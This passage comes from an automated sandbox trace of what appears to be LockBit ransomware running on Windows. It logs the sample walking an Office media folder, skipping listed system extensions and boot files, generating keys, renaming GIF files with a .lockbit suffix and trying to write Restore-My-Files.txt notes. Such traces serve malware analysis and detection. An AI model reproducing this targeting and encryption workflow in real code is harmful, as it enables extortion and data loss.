Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.799] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.799] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b6bd00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcef9740, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb9b6bd00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21518_.GIF", cAlternateFileName="")) returned 1 [0204.800] lstrcmpiW (lpString1=".", lpString2="BD21518_.GIF") returned -1 [0204.800] lstrcmpiW (lpString1="..", lpString2="BD21518_.GIF") returned -1 [0204.800] PathFindExtensionW (pszPath="BD21518_.GIF") returned=".GIF" [0204.800] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.800] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.800] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.801] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.801] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.801] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.801] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21518_.GIF") returned 1 [0204.801] lstrcmpiW (lpString1="ntldr", lpString2="BD21518_.GIF") returned 1 [0204.801] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21518_.GIF") returned 1 [0204.801] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21518_.GIF") returned 1 [0204.801] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21518_.GIF") returned -1 [0204.801] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21518_.GIF") returned 1 [0204.802] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21518_.GIF") returned 1 [0204.802] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.802] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF") returned=".GIF" [0204.802] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.802] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.802] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.803] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.803] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.803] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.803] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF.lockbit") returned 78 [0204.803] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21518_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.805] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.805] malloc (_Size=0x40068) returned 0x3df0008 [0204.805] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=255) returned 1 [0204.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.827] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.832] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.832] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.832] free (_Block=0x1fa2ed8) [0204.832] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.832] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.832] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.832] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbae7ea00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcef9740, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbae7ea00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21519_.GIF", cAlternateFileName="")) returned 1 [0204.833] lstrcmpiW (lpString1=".", lpString2="BD21519_.GIF") returned -1 [0204.833] lstrcmpiW (lpString1="..", lpString2="BD21519_.GIF") returned -1 [0204.833] PathFindExtensionW (pszPath="BD21519_.GIF") returned=".GIF" [0204.833] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.833] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.833] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.834] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.834] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.834] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.834] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.834] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.835] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.835] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21519_.GIF") returned 1 [0204.835] lstrcmpiW (lpString1="ntldr", lpString2="BD21519_.GIF") returned 1 [0204.835] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21519_.GIF") returned 1 [0204.835] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21519_.GIF") returned 1 [0204.835] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21519_.GIF") returned -1 [0204.835] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21519_.GIF") returned 1 [0204.835] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21519_.GIF") returned 1 [0204.835] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.835] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF") returned=".GIF" [0204.835] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.835] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.835] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.835] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.835] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.836] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.836] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF.lockbit") returned 78 [0204.836] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21519_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.838] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.838] malloc (_Size=0x40068) returned 0x3df0008 [0204.838] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0204.838] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.838] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.839] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.839] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.843] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.843] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.843] free (_Block=0x1fa2ed8) [0204.843] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.843] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.843] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.844] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbae7ea00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcef9740, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbae7ea00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21520_.GIF", cAlternateFileName="")) returned 1 [0204.844] lstrcmpiW (lpString1=".", lpString2="BD21520_.GIF") returned -1 [0204.844] lstrcmpiW (lpString1="..", lpString2="BD21520_.GIF") returned -1 [0204.844] PathFindExtensionW (pszPath="BD21520_.GIF") returned=".GIF" [0204.844] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.844] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.844] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.845] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.845] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.845] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.845] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.845] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.845] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21520_.GIF") returned 1 [0204.845] lstrcmpiW (lpString1="ntldr", lpString2="BD21520_.GIF") returned 1 [0204.845] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21520_.GIF") returned 1 [0204.846] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21520_.GIF") returned 1 [0204.846] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21520_.GIF") returned -1 [0204.846] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21520_.GIF") returned 1 [0204.846] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21520_.GIF") returned 1 [0204.846] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.846] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF") returned=".GIF" [0204.846] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.846] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.846] lstrcmpiW (lpString1=".dacpac", 